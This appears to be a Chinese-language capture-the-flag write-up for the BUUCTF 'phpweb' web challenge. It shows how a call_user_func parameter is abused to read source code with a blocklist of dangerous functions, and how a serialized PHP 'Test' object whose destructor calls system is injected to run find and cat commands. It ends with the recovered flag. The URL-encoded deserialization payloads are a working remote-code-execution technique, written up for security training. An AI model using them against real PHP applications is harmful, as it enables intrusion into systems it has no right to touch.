BUUCTF WEB [网鼎杯 2020 朱雀组]phpweb
-
进入环境,发现调用了
date()
函数,抓包后发现POST传参存在名为func,值为date的变量 -
尝试修改func变量
func=echo&p=Y-m-d+h%3Ai%3As+a
回显
Warning : call_user_func() expects parameter 1 to be a valid callback, function 'echo' not found or invalid function name in <b>/var/www/html/index.php on line 24
-
发现一个PHP代码执行漏洞,可以利用
call_user_func()
进行,尝试许多参数如shell_exec,system等均被过滤,尝试读取index.php文件内容func=file_get_contents&p=index.php
回显
<?php $disable_fun = array("exec", "shell_exec", "system", "passthru", "proc_open", "show_source", "phpinfo", "popen", "dl", "eval", "proc_terminate", "touch", "escapeshellcmd", "escapeshellarg", "assert", "substr_replace", "call_user_func_array", "call_user_func", "array_filter", "array_walk", "array_map", "registregister_shutdown_function", "register_tick_function", "filter_var", "filter_var_array", "uasort", "uksort", "array_reduce", "array_walk", "array_walk_recursive", "pcntl_exec", "fopen", "fwrite", "file_put_contents"); function gettime($func, $p) { $result = call_user_func($func, $p); $a = gettype($result); if ($a == "string") { return $result; } else { return ""; } } class Test { var $p = "Y-m-d h:i:s a"; var $func = "date"; function __destruct() { if ($this->func != "") { echo gettime($this->func, $this->p); } } } $func = $_REQUEST["func"]; $p = $_REQUEST["p"]; if ($func != null) { $func = strtolower($func); if (!in_array($func, $disable_fun)) { echo gettime($func, $p); } else { die("Hacker..."); } } ?>
-
发现Test类中存在__destruct()函数,怀疑存在反序列化漏洞
<?php class Test { var $p = "find / -name flag*"; var $func = "system"; } $res = new Test(); echo serialize($res);
O:4:"Test":2:{s:1:"p";s:18:"find / -name flag*";s:4:"func";s:6:"system";}
-
构造payload
func=unserialize&p=O%3a4%3a%22Test%22%3a2%3a%7bs%3a1%3a%22p%22%3bs%3a18%3a%22find%20%2f%20-name%20flag*%22%3bs%3a4%3a%22func%22%3bs%3a6%3a%22system%22%3b%7d
回显
/proc/sys/kernel/sched_domain/cpu0/domain0/flags /proc/sys/kernel/sched_domain/cpu1/domain0/flags /proc/sys/kernel/sched_domain/cpu10/domain0/flags /proc/sys/kernel/sched_domain/cpu11/domain0/flags /proc/sys/kernel/sched_domain/cpu12/domain0/flags /proc/sys/kernel/sched_domain/cpu13/domain0/flags /proc/sys/kernel/sched_domain/cpu14/domain0/flags /proc/sys/kernel/sched_domain/cpu15/domain0/flags /proc/sys/kernel/sched_domain/cpu16/domain0/flags /proc/sys/kernel/sched_domain/cpu17/domain0/flags /proc/sys/kernel/sched_domain/cpu18/domain0/flags /proc/sys/kernel/sched_domain/cpu19/domain0/flags /proc/sys/kernel/sched_domain/cpu2/domain0/flags /proc/sys/kernel/sched_domain/cpu20/domain0/flags /proc/sys/kernel/sched_domain/cpu21/domain0/flags /proc/sys/kernel/sched_domain/cpu22/domain0/flags /proc/sys/kernel/sched_domain/cpu23/domain0/flags /proc/sys/kernel/sched_domain/cpu24/domain0/flags /proc/sys/kernel/sched_domain/cpu25/domain0/flags /proc/sys/kernel/sched_domain/cpu26/domain0/flags /proc/sys/kernel/sched_domain/cpu27/domain0/flags /proc/sys/kernel/sched_domain/cpu28/domain0/flags /proc/sys/kernel/sched_domain/cpu29/domain0/flags /proc/sys/kernel/sched_domain/cpu3/domain0/flags /proc/sys/kernel/sched_domain/cpu30/domain0/flags /proc/sys/kernel/sched_domain/cpu31/domain0/flags /proc/sys/kernel/sched_domain/cpu4/domain0/flags /proc/sys/kernel/sched_domain/cpu5/domain0/flags /proc/sys/kernel/sched_domain/cpu6/domain0/flags /proc/sys/kernel/sched_domain/cpu7/domain0/flags /proc/sys/kernel/sched_domain/cpu8/domain0/flags /proc/sys/kernel/sched_domain/cpu9/domain0/flags /sys/devices/pnp0/00:00/tty/ttyS0/flags /sys/devices/platform/serial8250/tty/ttyS15/flags /sys/devices/platform/serial8250/tty/ttyS6/flags /sys/devices/platform/serial8250/tty/ttyS23/flags /sys/devices/platform/serial8250/tty/ttyS13/flags /sys/devices/platform/serial8250/tty/ttyS31/flags /sys/devices/platform/serial8250/tty/ttyS4/flags /sys/devices/platform/serial8250/tty/ttyS21/flags /sys/devices/platform/serial8250/tty/ttyS11/flags /sys/devices/platform/serial8250/tty/ttyS2/flags /sys/devices/platform/serial8250/tty/ttyS28/flags /sys/devices/platform/serial8250/tty/ttyS18/flags /sys/devices/platform/serial8250/tty/ttyS9/flags /sys/devices/platform/serial8250/tty/ttyS26/flags /sys/devices/platform/serial8250/tty/ttyS16/flags /sys/devices/platform/serial8250/tty/ttyS7/flags /sys/devices/platform/serial8250/tty/ttyS24/flags /sys/devices/platform/serial8250/tty/ttyS14/flags /sys/devices/platform/serial8250/tty/ttyS5/flags /sys/devices/platform/serial8250/tty/ttyS22/flags /sys/devices/platform/serial8250/tty/ttyS12/flags /sys/devices/platform/serial8250/tty/ttyS30/flags /sys/devices/platform/serial8250/tty/ttyS3/flags /sys/devices/platform/serial8250/tty/ttyS20/flags /sys/devices/platform/serial8250/tty/ttyS10/flags /sys/devices/platform/serial8250/tty/ttyS29/flags /sys/devices/platform/serial8250/tty/ttyS1/flags /sys/devices/platform/serial8250/tty/ttyS19/flags /sys/devices/platform/serial8250/tty/ttyS27/flags /sys/devices/platform/serial8250/tty/ttyS17/flags /sys/devices/platform/serial8250/tty/ttyS8/flags /sys/devices/platform/serial8250/tty/ttyS25/flags /sys/devices/virtual/net/lo/flags /sys/devices/virtual/net/eth0/flags /sys/devices/virtual/net/tunl0/flags /tmp/flagoefiu4r93 /tmp/flagoefiu4r93
-
最后在
/tmp/flagoefiu4r93
中找到flagfunc=unserialize&p=O%3a4%3a%22Test%22%3a2%3a%7bs%3a1%3a%22p%22%3bs%3a22%3a%22cat%20%2ftmp%2fflagoefiu4r93%22%3bs%3a4%3a%22func%22%3bs%3a6%3a%22system%22%3b%7d
flag{0ae2a444-4095-4452-9301-78e18c2a60b6}